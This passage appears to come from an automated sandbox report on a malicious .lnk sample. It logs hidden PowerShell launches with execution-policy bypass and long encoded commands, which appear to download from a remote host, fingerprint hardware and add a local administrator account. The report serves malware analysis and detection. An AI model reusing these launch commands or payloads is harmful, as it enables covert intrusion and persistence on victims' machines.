agwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvah
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabmagqayqbhadaamwa4ageazaa2agmamgblaguayqa0aduamqawadiazqa3agmayqa5agyayqa0adeanga3adganqa4aguazgbladkazaa3adkaoqa1agyamabjagyanaayagyamqbkageaoaawadkamaa0adaamgbjaguazgbjadianqa1adqazabkagqayqbjagqamaayageaygbjadcazga5adeazabhadyanwa1adeaywbjagmazqa5adaazabkadqaoaa4adcaygaxadeanga0aduanqbladqaoqbiaguaoaaxagqaygaxadaazga4adaaygbhageamqaxageanaayadqazgawadaanqbkadyazabiagqayqbkadcanqa0adganwa2agqanqa5aguanqbmadqangawagiamqbjadqazgbmagiayqa5agmazabkadeayqa0agmamwa5adcamaa1aduayqawadiaoabladaamga2adiamqbladyazaa0agmazqaxadqanabladaazgbladgamqa4agianwawaguangayadeaywa5agyanabmadganwa2adcaoqaxaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfafgadaauaeuabgbdag8azabpae4arwbdadoaogbvafqarga4ac4arwblahqauwb0afiaaqbuagcakaaoagkadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawahqaugaiackakqapackalgbdag8atgbuaguatgb0ackakqa=" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabmagqayqbhadaamwa4ageazaa2agmamgblaguayqa0aduamqawadiazqa3agmayqa5agyayqa0adeanga3adganqa4aguazgbladkazaa3adkaoqa1agyamabjagyanaayagyamqbkageaoaawadkamaa0adaamgbjaguazgbjadianqa1adqazabkagqayqbjagqamaayageaygbjadcazga5adeazabhadyanwa1adeaywbjagmazqa5adaazabkadqaoaa4adcaygaxadeanga0aduanqbladqaoqbiaguaoaaxagqaygaxadaazga4adaaygbhageamqaxageanaayadqazgawadaanqbkadyazabiagqayqbkadcanqa0adganwa2agqanqa5aguanqbmadqangawagiamqbjadqazgbmagiayqa5agmazabkadeayqa0agmamwa5adcamaa1aduayqawadiaoabladaamga2adiamqbladyazaa0agmazqaxadqanabladaazgbladgamqa4agianwawaguangayadeaywa5agyanabmadganwa2adcaoqaxaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabmagqayqbhadaamwa4ageazaa2agmamgblaguayqa0aduamqawadiazqa3agmayqa5agyayqa0adeanga3adganqa4aguazgbladkazaa3adkaoqa1agyamabjagyanaayagyamqbkageaoaawadkamaa0adaamgbjaguazgbjadianqa1adqazabkagqayqbjagqamaayageaygbjadcazga5adeazabhadyanwa1adeaywbjagmazqa5adaazabkadqaoaa4adcaygaxadeanga0aduanqbladqaoqbiaguaoaaxagqaygaxadaazga4adaaygbhageamqaxageanaayadqazgawadaanqbkadyazabiagqayqbkadcanqa0adganwa2agqanqa5aguanqbmadqangawagiamqbjadqazgbmagiayqa5agmazabkadeayqa0agmamwa5adcamaa1aduayqawadiaoabladaamga2adiamqbladyazaa0agmazqaxadqanabladaazgbladgamqa4agianwawaguangayadeaywa5agyanabmadganwa2adcaoqaxaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=

        Language, Device and Operating System Detection

        barindex
        Yara detected Obfuscated Powershell
        Source: Yara matchFile source: U82W1yZAYQ.lnk, type: SAMPLE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
